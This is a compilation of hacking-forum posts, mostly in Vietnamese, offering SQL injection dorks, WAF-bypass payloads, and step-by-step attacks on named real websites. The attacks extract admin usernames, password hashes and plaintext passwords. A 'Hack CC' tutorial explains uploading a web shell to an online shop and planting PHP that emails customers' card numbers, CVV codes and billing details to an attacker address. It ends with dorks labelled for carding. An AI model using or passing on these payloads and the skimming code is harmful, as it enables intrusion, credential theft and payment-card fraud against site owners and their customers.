All SQL Dork {PHP&SQL}

All SQL Dork {PHP&SQL} 

PHP

Code:

inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+   from
inurl:+union+select+   pass
inurl:+union+select+   SHOP
inurl:+union+select+    admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

ASP

Code:

".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory  ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID=  "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

Enjoy

Phím tắt

/*!50000OrDeR*/ /*!50000bY*/ -- - /**/ /*!50000 */ unhex(hex(group_concat(/*!50000table_name*/))) /*!50000from*/ informartion_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1 by pass 403: /*!union*/ /*!select*/ 1,2,concat_ws(0x3a,table_name),4,5,6,7 from information_schema./*!tables*/ where table_schema=database()-- - bypass all: /*!50000union*/ /*!50000select*/ 1,2,UNHEX(HEX(/*!50000CONCAT_WS*/(0x3a,/*!50000TABLE_NAME*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1-- - /*!50000union*/ /*!50000select*/ 1,2,unhex(hex(/*!50000CONCAT_WS*/(0x3a,/*!50000column_name*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000columns*/ /*!50000where*/ /*!50000table_name*/=0x... /*!50000limit*/ 0,1-- - seach version: /*!50000CONCAT_WS*/(CHAR(32,58,32),user(),database(),version()) convert(@@version using latin1) http://www.ga-k9.com/customer_testimonials.php?testimonial_id=/*!60000%2010*/ bypass union: 1) id=1+UnIoN+SeLecT 1*2*3-- - 2) id=1+UnIOn/**/SeLect 1*2*3-- - 3) id=1+UNIunionON+SELselectECT 1*2*3-- - 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3-- - 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3-- - 6) id=1+%23Makemoneybmt%0aUnIOn%23Makemoneybmt%0aSeLe cT+1*2 *3-- - 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1*2*3-- - 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1*2*3-- - /*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- - 9) Id=1/*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- - advance: Thay table name = char(...) or hex: 0x... vi d?: from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)-- - http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(table_name) USING latin1),4,5,6 From Information_schema.tables-- Char(58)=0x3a database()=0x64617461626173652829 error base: /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- version 5.. ta di tìm table ch?a user /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(group_concat(table_name),1,145) from information_schema.tables where table_schema=database()),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(group_concat(column_name),1,145) from information_schema.columns where table_name=0x11111111111),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- Sql Injection - Error Based (union all select) - Tutorial 1- example.com/whatever.php?id=-5 union all select 1,2,@@version,3-- 2- example.con/whatever.php?id=-5 union all select 1,2,database(),3-- 3- example.com/whatever.php?id=-5 union all select 1,2,table_name,3 from information_schema.tables-- 4- example.com/whatever.php?id=-5 union all select 1,2,column_name,3 from information_schema.columns where table_name = char(CHARCODEHERE) 5- example.com/wahtever.php?id=-5 union all select 1,2,concat(username),0x3a,(password),3 from (databasename).(tablename) --

[TUT] Magic Convertt Aspx

[TUT] Khai thác Sqli - Magic Convertt Aspx

Tình hình đang ôn thi đại học căng thẳng nên có rất ít thời gian để online cũng như tìm hiểu về hacking . Nhưng để đóng góp chút gì đó nhân dịp sinh nhật VNHack Family  thì Kẻ Chọc Giận xin làm một tut sql cơ bản cho newbie nghiên cứu . Ai biết rồi đừng gạch đá ấy nhé, sai sót  mong được góp ý !


Có site cho anh em nghiên cứu khai thác mà chưa ai có đáp án nên Kẻ lấy nó làm tut luôn cho anh em !

Victim : http://pgdmongcai.edu.vn/ ( victim tương tự : http://www.pgdhalong.edu.vn/ )

Chắc hẳn việc đầu tiên là các bạn tìm link lỗi để check nó đúng không ?

VD : 

http://pgdmongcai.edu.vn/Default.aspx?page=news&mod=news&catid=126

sẽ là cái mà các bạn để ý đầu tiên. Các bạn check lỗi :

 http://pgdmongcai.edu.vn/Default.aspx?page=news&mod=news&catid=126'

Thấy nó lỗi rồi . nhưng mà liệu order by có được không ? mình đã thử nhưng không có kết quả gì khác !

 Nhìn quanh quanh click click nó ra cái link : 

http://pgdmongcai.edu.vn/Default.aspx?page=congvan&mod=congvan

âu sề . link đăng nhập . nhưng không có nick admin thì đăng có cũng bằng thừa .
Nhưng tại sao chúng ta không thử check lỗi ở ô "Tên truy cập" =)))))) . check thử nào :D

Và lỗi xuất hiện :P 

=> việc khó ở đây không phải là hack nó như thế nào . mà là tìm chỗ nào lỗi để hack :)

Vậy là đến đây nhiều mem đã biết nó bị lỗi như thế nào và check ra làm sao. Nhưng mình vẫn làm chi tiết cho newbie tham khảo nhé :D. ok ! trở lại link đăng nhập mà chúng ta vừa check

http://pgdmongcai.edu.vn/Default.aspx?page=congvan&mod=congvan

( Chú ý : Mọi querry mình đưa ra đều được inject vào ô Tên truy cập )

Version của nó :

' and 1=convert(int,@@version)-- - 

KQ :

( get tên database : ' and 1=convert(int,db_name())-- - )


Tiếp theo là get table :

' and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -

 table đầu tiên xuất hiện trước mắt . nhưng nó chỉ ra 1 table . Ta phải làm cho nó hiển thị các table khác.

' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private')))-- -

KQ :  
 Conversion failed when converting the nvarchar value 'tbl_permission' to data type int.
nó xuất hiện thêm table 'tbl_permission'  . tiếp tục tìm table tiếp theo 

' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private','tbl_permission' )))-- -

  
Conversion failed when converting the nvarchar value 'tbl_siteinfo' to data type int.

xuất hiện thêm table 'tbl_permission' . cứ tiếp tục như vậy cho đến khi ta tìm được như sau :

' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private','tbl_permission','tbl_siteinfo','tbl_student_point','tbl_student','tbl_th_pupil','tbl_th_adv','tbl_th_category_news','tbl_adv','tbl_th_class','tbl_category_gallery','tbl_th_news','tbl_category_library','tbl_category_news','tbl_th_siteinfo','tbl_th_vote_answer','tbl_category_news_private','tbl_th_vote_question') ))-- -

Kết quả hiện ra giành cho ai không nản khi check nó :D

 Giờ tiếp tục get column trong table tbl_user

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') ))-- -

nó chỉ hiện 1 column nên ta làm tương tự như phần check table

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') ))-- -

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') and column_name not in ('PK_UserID','C_UserName') ))-- -

Kết Quả là tìm được 3 column : 

PK_UserID
C_UserName
C_UserPass

Và giờ là get nick admin thôi :)

Get Nick :  

 ' and 1=convert(int,(select top 1 C_UserName from tbl_user))-- -

Get Password :  

' and 1=convert(int,(select top 1 C_UserPass from tbl_user))-- -

KQ :  admin | d5a43b10e1eb57474e50e2eca8034f4f 

Đời lắm bất công nên phải tập chấp nhận với việc không crack được pass =))

TUT xPath Injection

http://www.ianforsythphotographer.com/main.php?id=1'

Lỗi

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Dùng đoạn lệnh này lấy ver

and extractvalue(rand(),concat(0x0a,version()))--+

link :

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+

Có thông tin : "Query failed: XPATH syntax error: ' 5.1.39-log'" ==> ver > 5

get tablename bằng đoạn code sau:

and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+

Link Dạng

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+

Ta có: "Query failed: XPATH syntax error: ':logger_config'"

tablename: plogger_config

ta khai thác tiếp bằng code sau:

and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))

trong đó table name ta thay bằng plogger_config mà ta đã check đc lúc nãy và ta có link:

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+

ta có:

"Query failed: XPATH syntax error: '::admin_username'"

và

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+

"Query failed: XPATH syntax error: '::admin_password'"

và ta có đoạn lấy pass và username tổng hợp bằng code sau:

extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))--

Trong đó COLUMNS là hai cái column ta khai thác dc là

+ admin_username

+ admin_password

trong đó columns se có dạng select concat(admin_username,0x3a,admin_password) nhớ là có 0x3a

và TABLE là cái table ta khai thác dc lúc đầu thay vào link có dang:

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+

"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"

haha 392592ed88f501ea498f14343' ==> MD5 còn nữa là chuyện của anh em nhé

SQLi by pass 403

http://www.ettu.org/news_view.php?id=2583'

Lổi

Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect

típ

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3 <== No blank Page

típ

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10 <== No blank Page

típ

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16 <== No blank Page

http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page

Vậy web có 16 colums

đặt dấu - ở trước số id và dấu -- ở cuối

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

ta được :

2

4

cột 2 & 4 có thể sử dụng

lấy version tại cột 2

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

=>

5.1.37-1ubuntu5.5

get user() tại cột 2

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

=>

ettu_admin@localhost

get database()

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

ettu.org_ettu_db01

get table => group_concat(table_name) ở cột 2

FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() -> show tất cả table ở database

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

đổi table_name thành colum_name đề get colum

http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--

show các colum name

http://www.ettu.org/news_view.php?id=-2583+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+information_schema.columns+where+table_name=CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105, 110)

=>

id,login,password,stato,id_squ,girone,abilitato

đọc id pass administrator

http://www.ettu.org/news_view.php?id=-2583+union+select+1,group_concat(id,0x3a,login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+0910ettucup01_admin--

1:adminvitesse:vitesse2006

2:admin:matchvitesse

TUT Hack CC

TUT Hack CC

allinurl: /sub.php?Page=1

chuyển về dạng

http://abc.com/detail.php?pid=....

hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin

http://abc.com/admin_login.php

http://abc.com/cp

vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>

thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới

<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>

notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất 

Tutorial WAF Bypassing SQLi

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments: 
You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters: 
You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods: 
What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls! 
4) Replaced Keywords: 
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected! 
5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash: 
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(( You can test if the WAF can be crashed by typing:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values: 
We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi: 
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

 COMMAND | WHAT TO USE INSTEAD
@@version       | version()
concat()           | concat_ws()  --> Difference between concat() and concat_ws():  http://is.gd/VEeiDU 
group_concat() | concat_ws() 

Learning MySQL Really helps on such issues!

4) Misc Exploitable Functions: 
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4&#8230 ;
(If the Firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it, in this way!

[+] In addition to the previous example, some other bypasses might be: 

-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)

Video Tutorial on WAF Bypassing:

NEW CC SHOP DORKS

NEW CC SHOP DORKS

InI Dork Untuk Carding
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"


inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"